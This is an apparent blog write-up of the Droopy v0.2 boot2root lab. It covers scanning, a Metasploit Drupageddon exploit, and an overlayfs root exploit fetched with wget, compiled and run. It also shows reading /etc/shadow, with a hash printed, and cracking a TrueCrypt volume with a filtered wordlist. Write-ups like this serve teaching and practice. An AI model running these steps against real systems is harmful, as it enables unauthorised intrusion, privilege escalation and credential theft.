This is my very first boot2root write-up. I had a lot of fun completing the challenge and writing up how I did it.

Today’s challenge is called Droopy: v0.2.  This challenge was very similar to the types of systems that I faced during the OSCP lab.  It was pretty straight forward, discover, enumerate, exploit, and loot.  It was an easy one but still quite fun.  Adding in the extra puzzle at the end was a nice touch and forced me to learn some new tools I hadn’t had the opportunity to use before.

Discover:

Fist I needed to find the IP address.

netdiscover -r 10.0.2.0/24

netdiscover

Ahh, it looks like it is 10.0.2.28.

Enumeration:

To find running services I had to enumerate.

nmap -p- -A 10.0.2.28

nmap

It looks like only one port is open. Port 80 and it’s running Drupal 7.

Next I run Nikto to see if I can find any obvious low hanging fruit.

nikto -host http://10.0.2.28

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.0.2.28
+ Target Hostname: 10.0.2.28
+ Target Port: 80
+ Start Time: 2016-04-27 20:16:45 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.5
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-generator' found, with contents: Drupal 7 (http://drupal.org)
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-3268: /scripts/: Directory indexing found.
+ Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x60e 0x4fef78de7d280
+ OSVDB-3268: /includes/: Directory indexing found.
+ Entry '/includes/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /misc/: Directory indexing found.
+ Entry '/misc/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /modules/: Directory indexing found.
+ Entry '/modules/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /profiles/: Directory indexing found.
+ Entry '/profiles/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/scripts/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /themes/: Directory indexing found.
+ Entry '/themes/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALL.mysql.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALL.pgsql.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALL.sqlite.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/install.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/LICENSE.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/MAINTAINERS.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/UPGRADE.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/xmlrpc.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=filter/tips/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/password/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/register/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/login/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 36 entries which should be manually viewed.
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Multiple index files found: /index.php, /index.html
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-3092: /web.config: ASP config file is accessible.
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3092: /misc/: This might be interesting...
+ OSVDB-3092: /scripts/: This might be interesting... possibly a system shell found.
+ /info.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3092: /UPGRADE.txt: Default file found.
+ OSVDB-3092: /install.php: Drupal install.php file found.
+ OSVDB-3092: /install.php: install.php file found.
+ OSVDB-3092: /LICENSE.txt: License file found may identify site software.
+ OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.
+ OSVDB-3233: /INSTALL.mysql.txt: Drupal installation file found.
+ OSVDB-3233: /INSTALL.pgsql.txt: Drupal installation file found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /info.php?file=http://cirt.net/rfiinc.txt?: Output from the phpinfo() function was found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ OSVDB-3268: /sites/: Directory indexing found.
+ 8383 requests: 0 error(s) and 52 item(s) reported on remote host
+ End Time: 2016-04-27 20:17:11 (GMT-4) (26 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Nikto found a bunch of interesting directories with indexing enabled and typical Drupal files.

With the information I have obtained, I now have a pretty good idea of to attack this.

Exploitation:

I decided to fire up Metasploit because I knew it had an exploit that works against Drupal.

msfconsole

search drupal

msfconsole

use exploit/multi/http/drupal_drupageddon

set rhost 10.0.2.28

dupal_msf.png

Now that I have Metasploit configured I can run the exploit.

run

msf_drup_expl.png

Success! I have a meterpreter shell.

I decide to drop into a command shell to have a look around.

shell

I wanted to have a better looking shell so I ran the following command.

python -c 'import pty;pty.spawn("/bin/bash")'

Let’s see what user I am running as.

id

met_shell

I have a low privilege shell so now I need to elevate.

Elevate:

I start by identifying the kernel and version of Linux is running so I can narrow down an exploit.

uname -a && cat /etc/issue

unmae

Now I know what I am dealing with.  Next I need to find a directory I can write to and run scripts from.
find / -writable -type d 2>/dev/null

wold_write

Ok, the /tmp directory looks like a good place to work from.

I searched Exploit-db for a privesc exploit that works for Ubuntu 14.04.

I find the overlayfs Local Root exploit and give it go.

wget https://www.exploit-db.com/download/37292 && mv 37292 ofs.c

gcc ofs.c -o ofs

./ofs

id

root.png

And success!! I have root.

Loot:

While looking around I find an email that looks interesting.

cat /var/mail/www-data

mail

Ah, ok so there must me an encrypted file somewhere with the flag in it.

ls -la /root

loot

I found a TrueCrypt volume in the root home directory.

I continued to look around and checked out the shadow file.

cat /etc/shadow

shadow

The hash looks interesting, so I wanted to know what kind of hash it is. This proved useful later.

$6$4onuSzBI$X19Aq0XXMti44iNSno3omOTq.fCPo342mPfprBQMMuXENvX1kt975gI1tkmR4h574GyBZRpfECmciaVWKISuT0:16415:0:99999:7:::
http://www.onlinehashcrack.com/hash-identification.php

hash

Ok, it’s a sha512 hash.

I move on to attacking the TrueCrypt volume. The truecrack version in Kali gives you three key options to choose from.

ripemd160|sha512|whirlpool

Since the hash I looked at before was identified as sha512, it seemed logical to start there.

truecrack --truecrypt dave.tc -k sha512 -w /usr/share/wordlists/rockyou.txt

After 24hrs and only 1.5M attempts completed along with truecrack segfaulting several times on really long strings and strings with weird characters.  I needed to take a different approach.

I see that rockyou.txt has over 14M lines.  If I kept going with the same strategy it could take quite awhile. I needed a plan.

root@Oak:~# wc -l /usr/share/wordlists/rockyou.txt 
14344382 /usr/share/wordlists/rockyou.txt

I don’t have a GPU rig so I decided that I needed to narrow down the word list file to a more manageable level. I went back to the email from Dave to look for clues. The email mentioned 11 characters, and something about an academy.  I decided to find all lowercase strings ending in academy from the rockyou.txt file and export it to a custom wordlist file.

awk 'length($1) == 11 { print $1 }' /usr/share/wordlists/rockyou.txt |egrep '^[[:lower:]]+academy' > 11characademy.lst

The new wordlist only contains 11 lines. I didn’t think it would work, but I gave it a go anyway.

root@Oak:~# wc -l Downloads/11characademy.lst 
11 Downloads/11characademy.lst

truecrack --truecrypt dave.tc -k sha512 -w 11characademy.lst

Success! Wow, I was surprised. That saved a lot of time.

tcracked

Now to mount the volume and explore its hidden treasures.

mkdir dave && cryptsetup --type tcrypt open Downloads/dave.tc dave && mount /dev/mapper/dave dave

With the volume mounted I did a recursive listing to see if anything stuck out.

Sure enough, the flag has been found!

root@Oak:~# ls -laR dave/
dave/:
total 20
drwxr-xr-x 6 root root 1024 Apr 12 08:00 .
drwxr-xr-x 58 root root 4096 Apr 29 10:51 ..
drwxr-xr-x 2 root root 1024 Apr 29 10:59 buller
drwx------ 2 root root 12288 Apr 12 07:53 lost+found
drwxr-xr-x 2 root root 1024 Apr 29 10:59 panama
drwxr-xr-x 3 root root 1024 Apr 29 10:54 .secret

dave/buller:
total 11
drwxr-xr-x 2 root root 1024 Apr 29 10:59 .
drwxr-xr-x 6 root root 1024 Apr 12 08:00 ..
-rw-r--r-- 1 root root 8393 Oct 4 2013 BullingdonCrest.jpg

dave/lost+found:
total 13
drwx------ 2 root root 12288 Apr 12 07:53 .
drwxr-xr-x 6 root root 1024 Apr 12 08:00 ..

dave/panama:
total 52
drwxr-xr-x 2 root root 1024 Apr 29 10:59 .
drwxr-xr-x 6 root root 1024 Apr 12 08:00 ..
-rw-r--r-- 1 root root 49257 Jun 15 2014 shares.jpg

dave/.secret:
total 64
drwxr-xr-x 3 root root 1024 Apr 29 10:54 .
drwxr-xr-x 6 root root 1024 Apr 12 08:00 ..
-rw-r--r-- 1 root root 61118 Feb 25 03:57 piers.png
drwxr-xr-x 2 root root 1024 Apr 12 08:16 .top

dave/.secret/.top:
total 3
drwxr-xr-x 2 root root 1024 Apr 12 08:16 .
drwxr-xr-x 3 root root 1024 Apr 29 10:54 ..
-r-------- 1 root root 872 Apr 12 08:16 flag.txt

flag

Final Thoughts:

This challenge was great fun. I liked the extra step of cracking the TrueCrypt volume to find the flag.  It gave me an opportunity to learn about cryptsetup for mounting TrueCrypt volumes and a chance to use truecrack.  Due to my hardware limitations I was forced to think outside the box to save time. I look forward to more challenges from knightmare.

 

Advertisements